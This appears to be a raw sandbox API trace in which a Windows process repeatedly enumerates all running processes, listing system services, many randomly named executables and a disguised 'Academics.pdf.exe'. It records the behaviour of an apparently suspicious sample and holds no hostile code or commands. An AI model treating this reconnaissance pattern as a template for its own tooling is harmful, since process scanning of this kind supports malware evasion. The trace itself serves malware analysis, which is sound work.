lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.649] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.650] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.651] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.652] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0311.652] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.653] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.654] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0311.655] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0311.656] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0311.656] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0311.657] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.658] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0311.659] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0311.660] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0311.660] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0311.661] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0311.662] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0311.663] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0311.664] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0311.664] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0311.665] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0311.666] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0311.667] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0311.668] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0311.668] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0311.669] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0311.670] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0311.671] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0311.672] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0311.672] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0311.673] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.674] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0311.675] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.676] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0311.676] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0311.677] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0311.678] CloseHandle (hObject=0x294) returned 1 [0311.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0311.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0311.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0311.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0311.678] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0311.678] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0311.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0311.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0311.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0311.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0311.679] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0311.681] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.682] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0311.682] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0311.683] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0311.684] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0311.685] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0311.686] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0311.686] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0311.687] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0311.688] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0311.697] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.698] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.699] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.699] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.700] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.701] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0311.702] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.703] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.703] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0311.704] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0311.705] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0311.706] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0311.707] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.707] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0311.708] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0311.709] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0311.710] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0311.710] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0311.711] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0311.712] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0311.713] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0311.714] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0311.714] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0311.715] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0311.716] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0311.717] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0311.718] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0311.718] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0311.719] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0311.720] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0311.721] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0311.722] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, 